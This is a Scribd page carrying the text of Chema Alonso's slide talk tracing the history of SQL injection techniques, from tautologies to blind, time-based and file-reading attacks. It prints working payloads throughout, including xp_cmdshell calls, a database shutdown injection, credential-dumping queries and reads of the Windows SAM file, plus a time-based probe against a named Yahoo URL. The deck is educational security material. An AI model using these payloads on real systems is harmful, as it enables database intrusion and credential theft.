Scribd Logo
Carica

Benvenuto in Scribd!

  • Chema Alonso

    Caricato da

    100_x_100
    288 visualizzazioni51 pagine
    Chema Alonso

    Copyright

    © © All Rights Reserved

    Formati disponibili

    PPTX, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    Chema Alonso

    Copyright:

    © All Rights Reserved
    Scarica in formato PPTX, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    288 visualizzazioni51 pagine

    Chema Alonso

    Caricato da

    100_x_100
    Chema Alonso

    Copyright:

    © All Rights Reserved
    Scarica in formato PPTX, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 51

    Feliz 15 aniversario, SQL Injection!

    What this talk is not about?

    What this talk is not about?

    What this talk is not about?

    This is about Love

    Los Amantes del Crculo Polar

    25 Dec 1998: El nacimiento

    http://www.phrack.org/issues.html?id=8&issue=54

    Begining

    Tautology

    admin
    or 1=1

    q=Select uid from users where uid=+$user+ and pass=+pass+;


    q=Select uid from users where uid=admin and pass= or 1=1;

    14 Aug 2007: IBM

    http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability

    Place

    Inband
    -1 union select 1,1,1,1,username,1,a,1 from users --

    2001 - OutBand

    http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc

    Yesterday - [Microsoft][ODBC SQL Server Driver]


    [SQL Server]Incorrect syntax near the keyword 'or'.

    q=Select title from noticias where ud=+$id+;

    Id=1 or 1=(select top 1 username from sysusers) --

    Jul 2007: Microsoft Partner Programme

    2002 Advanced SQL Injection Techniques

    https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf

    Advanced Tricks
    Username: '; begin declare @ret varchar(8000) set @ret=':' select
    @ret=@ret+' '+username+'/'+password from users where username>@ret
    select @ret as ret into foo end--

    Username: ' union select ret,1,1,1 from foo--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07


    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
    the varchar value ': admin/r00tr0x! guest/guest chris/password
    fred/sesame' to a column of data type int.

    exec master..xp_cmdshell 'dir'

    Id= 1; shutdown --

    27 Mar - 2007

    Outter Bands
    DNS Queries
    FTP Sites
    SMB Files
    Remote DB
    Web Files

    Log Files

    Eyes of Fear

    2002 - Blind
    http://server/miphp.php?id=1 and 1=1
    True
    http://server/miphp.php?id=1 and 1=0
    False

    2010 US Army

    2010 US Army

    Time

    2002 Time Based Blind SQL Injection

    http://www.northernfortress.net/more_advanced_sql_injection.pdf

    (more) Advanced Tricks

    ping -n 10 127.0.0.1

    if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

    2004 Time-Based in Other Databases


    SQL Server
    1) ; if wait for delay
    2) ; exec xp_cmdshell (ping n)
    Oracle
    1) dms_lock.sleep()
    PL/SLQ Injection
    MySQL
    1) and sleep()
    5.0 or higher
    2) Benchmarck functions
    Postgres:
    1) pg:sleep()

    Jun 2007 : Solar Empire Exploit

    http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html

    Apr 2013: Yahoo!

    http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=
    2&scId=113; select SLEEP(5)--

    http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html

    2007 Time-Based SQL Injection using Heavy Queries

    https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf

    Time-Based Using Heavy Queries in MS Access

    True

    False

    Deep Blind SQL Injection

    http://labs.portcullis.co.uk/application/deep-blind-sql-injection

    Ace

    Serialized SQL Injection

    union select '1','2','3',(select * from sysusers for xml raw, binary base64)

    pass=

    Inverted Queries - Lefties


    q=Select uid from users where +$user+=user and +pass+ pass;

    Airthmetic Blind SQL Injection

    Id=A+(1/(ASCII(B)-C))

    Id=A+ASCII(B)-C

    Id=A+((C/ASCII(B))*(K))

    RFD (Remote File Downloading) SQL Server 2K

    And 200>ASCII (SUBSTRING(SELECT * FROM


    OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt;
    *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt),1,1))
    ; Create Table TempTable as (row varchar(8000)) -; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',
    ROWTERMINATOR = '\n) -; alter table TempTable add num int IDENTITY(1,1) NOT NULL
    and (select COUNT(row) from TempTable)
    and (select top 1 len(row) from TempTable where num = rownum)
    and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num
    = 1)
    ; Drop Table TempTable--

    RFD (Remote File Downloading) SQL Server 2K5++

    AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK


    'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))

    RFD (Remote File Downloading) MySQL

    LoadFile
    SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

    Load Data infile


    ; Create table C8DFC643 (datos varchar(4000))
    ; Load data infile 'c:\\boot.ini' into table C8DFC643
    ; alter table C8DFC643 add column num integer auto_increment
    unique key
    and (select count(num) from C8DFC643)
    and (select length(datos) from C8DFC643 where num = 1)
    and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
    ; Drop table C8DFC643

    RFD (Remote File Downloading) Oracle


    External Tables & Plain Text Files
    ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; - ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization
    external (TYPE ORACLE_LOADER default directory A4A9308C access parameters (
    records delimited by newline ) location (''boot.ini''))'; end;--

    DBMS_LOB
    ; execute immediate
    DECLARE l_bfile BFILE;
    l_blob BLOB;
    BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
    l_blob;
    l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
    DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
    DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
    DBMS_LOB.fileclose(l_bfile);
    COMMIT;
    EXCEPTION
    WHEN OTHERS THEN ROLLBACK;
    END;
    ; end; --

    CSRF+SQLi

    Smuggling

    /**/aNd/**/1=aSC(substr(user(),1,1))%00

    Braveness

    Connection String Parameter Pollution

    http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-StringParameter-Pollution-wp.pdf

    XPath Injection

    http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf

    LDAP Injection

    http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

    OWASP TOP 10 - 2013

    Forbidden

    q=Select uid from users where uid=+$user+ and pass=+pass+;

    Use Brain not tech


    PHP Magic Quotes?

    ->

    id=1 and 1=1

    Python?

    ->

    No invulnerable

    .NET?

    ->

    No invulnerable

    LinQ?

    ->

    No invulnerable

    Fixing Code Injections isnt the worst job

    More

    @chemaalonso
    http://www.elladodelmal.com
    http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html

    Potrebbero piacerti anche